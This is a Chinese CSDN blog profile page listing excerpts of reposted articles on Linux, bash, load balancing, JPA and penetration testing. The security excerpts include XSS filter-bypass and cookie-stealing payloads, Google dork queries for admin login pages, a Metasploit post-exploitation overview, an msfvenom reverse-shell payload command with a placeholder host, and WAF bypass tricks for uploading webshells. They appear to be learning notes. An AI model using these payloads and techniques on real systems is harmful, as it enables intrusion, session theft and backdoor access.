weixin_30241919
码龄9年
关注
提问 私信
  • 博客:939,206
    社区:1
    939,207
    总访问量
  • 暂无
    原创
  • 1,505,166
    排名
  • 97
    粉丝
  • 0
    铁粉
  • 加入CSDN时间: 2015-07-30
博客简介:

weixin_30241919的博客

查看详细资料
个人成就
  • 获得195次点赞
  • 内容获得0次评论
  • 获得1,134次收藏
  • 代码片获得204次分享
创作历程
  • 690篇
    2019年
  • 742篇
    2018年
  • 707篇
    2017年
  • 556篇
    2016年
  • 409篇
    2015年
  • 300篇
    2014年
  • 256篇
    2013年
  • 234篇
    2012年
  • 134篇
    2011年
  • 123篇
    2010年
  • 91篇
    2009年
  • 83篇
    2008年
  • 55篇
    2007年
  • 35篇
    2006年
  • 24篇
    2005年
  • 4篇
    2004年
成就勋章
创作活动更多

HarmonyOS开发者社区有奖征文来啦!

用文字记录下您与HarmonyOS的故事。参与活动,还有机会赢奖,快来加入我们吧!

0人参与 去创作
  • 最近
  • 文章
  • 代码仓
  • 资源
  • 问答
  • 帖子
  • 视频
  • 课程
  • 关注/订阅/互动
  • 收藏
搜TA的内容
搜索 取消

/usr,/usr/local/ 还是 /opt 目录区别

Linux 的软件安装目录是也是有讲究的,理解这一点,在对系统管理是有益的/us(Unix Software Resource)r:系统级的目录,可以理解为C:/Windows/,/usr/lib理解为C:/Windows/System32。/usr/local:用户级的程序目录,可以理解为C:/Progrem Files/。用户自己编译的软件默认会安装到这个目录下。/opt:用...
转载
发布博客 2019.09.20 ·
268 阅读 ·
0 点赞 ·
0 评论 ·
0 收藏

XSS的简单过滤和绕过

XSS的简单过滤和绕过程序猿用一些函数将构成xss代码的一些关键字符给过滤了。但是,道高一尺魔高一丈,虽然过滤了,还是可以尝试进行过滤绕过,以达到XSS攻击的目的。最简单的是输入<script> alert(7)</script> 弹出7 一:区分大小写过滤标签可以使用大小写绕过 <scripT>alert(7)</s...
转载
发布博客 2019.09.17 ·
358 阅读 ·
0 点赞 ·
0 评论 ·
0 收藏

渗透测试之信息收集

信息收集:Google搜索:intext:后台登录(搜索正文中包含后台登录的网页)alltitle:后台登录 管理员(搜索包含后台登录 管理员的网页,可以指定多个词)inurl:login(搜索URL中包含Login的网页)inurl:/admin/login.php(查找管理员登录页面)inurl:/phpmyadmin/index.php(查找后台数据库管...
转载
发布博客 2019.09.17 ·
449 阅读 ·
0 点赞 ·
0 评论 ·
0 收藏

bd----------高并发与负载均衡--------lvs搭建

实际操作过程中,开启httpd服务后可能物理机能ping通该IP但是无法访问该IP的80端口,此时需要关闭centos系统的防火墙转载于:https://www.cnblogs.com/ryuuku/p/11627368.html...
转载
发布博客 2019.10.06 ·
671 阅读 ·
0 点赞 ·
0 评论 ·
0 收藏

bd-----网络基础

·-+转载于:https://www.cnblogs.com/ryuuku/p/11624285.html
转载
发布博客 2019.10.05 ·
853 阅读 ·
0 点赞 ·
0 评论 ·
0 收藏

bd----------高并发与负载均衡--------lvs三种模型推导

  lvsVIP:虚拟服务器地址DIP:转发的网络地址  -1,与RIP通信:ARP协议,获取Real Server的RIP:MAC地址  -2,转发Client的数据包到RIP 上(隐藏的VIP)RIP:后端的真实主机CIP:客户端IP地址                                        ...
转载
发布博客 2019.10.05 ·
656 阅读 ·
0 点赞 ·
0 评论 ·
0 收藏

bd------bash编程--引用&命令替换

[root@node01 sh]# a=99[root@node01 sh]# echo "$a"99[root@node01 sh]# echo '$a'$a[root@node01 sh]# echo $a99[root@node01 sh]# echo "99"99[root@node01 sh]# echo "\"99\"""99"[root...
转载
发布博客 2019.10.04 ·
193 阅读 ·
0 点赞 ·
0 评论 ·
0 收藏

bd------bash编程--表达式

  :[root@node01 ~]# vi /etc/sysconfig/network-scripts/ifcfg-eth0转载于:https://www.cnblogs.com/ryuuku/p/11624183.html
转载
发布博客 2019.10.05 ·
197 阅读 ·
0 点赞 ·
0 评论 ·
0 收藏

bd------bash编程--重定向和变量1

  文本流和重定向覆盖重定向[root@node01 ~]# ls / 1>aaa追加重定向[root@node01 ~]# ls /mnt >>aaa先输出外层内容再输出内层内容[root@node01 ~]# ls /tmp //:bin boot dev etc home jdk-7u67-lin...
转载
发布博客 2019.10.04 ·
199 阅读 ·
0 点赞 ·
0 评论 ·
0 收藏

bd------bash编程--变量2

变量的特殊情况:当变量与字符串一起使用时,需注意把echo $12 改为 echo ${12}参数引用时关于$1是否需要引用的情况是:不加引号时 bash 和脚本函数 都可以应用$1变量导致冲突若想把参数$1当作变量传给bash引用时不加引号,传给前面的命令时加上引号bash对逗号不敏感,对空格敏感,如下图...
转载
发布博客 2019.10.04 ·
176 阅读 ·
0 点赞 ·
0 评论 ·
1 收藏

bd-----软件安装

---恢复内容开始---  安装rpm格式的jdk包[root@node01 /]# rpm -ivh jdk-7u67-linux-x64.rpm添加环境变量:[root@node01 /]# vi /etc/profileexport JAVA_HOME = /usr/java/jdk1.7.0_67export PATH = $PA...
转载
发布博客 2019.10.03 ·
234 阅读 ·
0 点赞 ·
0 评论 ·
0 收藏

bd-----用户管理

[root@node01 ~]# useradd sxt01[root@node01 home]# passwd sxt01[root@node01 /]# mkdir /share[root@node01 share]# groupadd share[root@node01 share]# id root[root@node01 share]# id sxt01...
转载
发布博客 2019.09.29 ·
292 阅读 ·
0 点赞 ·
0 评论 ·
0 收藏

bd-----文本分析

  wc :print newline, word, and byte counts for each filevi 全屏编辑器sed : 行编辑器修改文件ifcfg-eth0 中的IP地址[root@node01 ~]# sed 's/\(IPADDR=\(\([0-9]\|[1-9][0-9]\|1[0-9][0-9]\...
转载
发布博客 2019.09.28 ·
250 阅读 ·
0 点赞 ·
0 评论 ·
0 收藏

软件安全--xss跨站脚本攻击

简介:恶意攻击者往Web页面里插入恶意Script代码,当用户浏览页面时,嵌入其中的Script代码会被执行,从而达到恶意攻击用户的目的。触发:发生在目标网站中目标用户的浏览器层面上常见:公共留言板,公共可见文本测试方法:(1)cookies弹框<script>alert(document.cookie)</script>(2)cookie...
转载
发布博客 2019.07.25 ·
153 阅读 ·
0 点赞 ·
0 评论 ·
0 收藏

JPA查询转换自定义对象

今天有遇到需要用JPA查询数据,并将结果转换到DTO的场景,找到了两种方法,这里记录一下其中实体类为:@Data@Entity@Table(name = "CLASSIFY_PERSON")public class ClassifyPerson { @Id private String id; @Column private...
转载
发布博客 2019.09.18 ·
464 阅读 ·
0 点赞 ·
0 评论 ·
1 收藏

后渗透

MSF后渗透包括:提权,进程迁移,令牌假冒,获取凭证,操作文件系统,系统其它操作,端口转发和内网代理,后门提权通常webshell的权限都比较低,能够执行的操作有限,没法查看重要文件、修改系统信息、抓取管理员密码和hash、安装特殊程序等,所以我们需要获取系统更高的权限。绕过UAC用户帐户控制(UAC)是微软在 Windows Vista 以后版本引入的一种安全机制,有助...
转载
发布博客 2019.09.02 ·
458 阅读 ·
1 点赞 ·
0 评论 ·
4 收藏

Msf小结

Msfvenom是有效负载生成和编码的组合。生成攻击载荷Linux下反弹Meterpreter shell1msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=<IP Address> LPORT=<your port to connect on> -e -f elf -a...
转载
发布博客 2019.08.27 ·
243 阅读 ·
0 点赞 ·
0 评论 ·
0 收藏

SQL Injection

SQL Injection:就是通过把SQL命令插入到Web表单递交或输入域名或页面请求的查询字符串,最终达到欺骗服务器执行恶意的SQL命令。0x01定义具体来说,它是利用现有应用程序,将(恶意)的SQL命令注入到后台数据库引擎执行的能力,它可以通过在Web表单中输入(恶意)SQL语句得到一个存在安全漏洞的网站上的数据库,而不是按照设计者意图去执行SQL语句本质代码和数据...
转载
发布博客 2019.08.12 ·
160 阅读 ·
0 点赞 ·
0 评论 ·
0 收藏

安全狗文件绕过

上传绕过WAF的一些常用方法0X01姿势总结(1)fuzz文件名后缀方法用burpsuite进行模糊测试,寻找黑名单之外的文件(2)windows系统可以进行后缀修改如:webshell.php……………..(3)路径绕过:有些WAF只会监视某个目录是否被上传webshell(4)大小写组合如:PhP,pHp(5)filename换行(6)多个filename(7)引号绕过如:双...
转载
发布博客 2019.08.24 ·
488 阅读 ·
0 点赞 ·
0 评论 ·
1 收藏

Linux 基础整理

Linux系统的启动过程大体上可分为五部分:内核的引导;运行init;系统初始化;建立终端 ;用户登录系统。用户登录Linux的账号验证程序是login,login会接收mingetty传来的用户名作为用户名参数。然后login会对用户名进行分析:如果用户名不是root,且存在/etc/nologin文件,login将输出nologin文件的内容,然后退出。这通常用来系统维护时防...
转载
发布博客 2019.08.06 ·
104 阅读 ·
0 点赞 ·
0 评论 ·
0 收藏
加载更多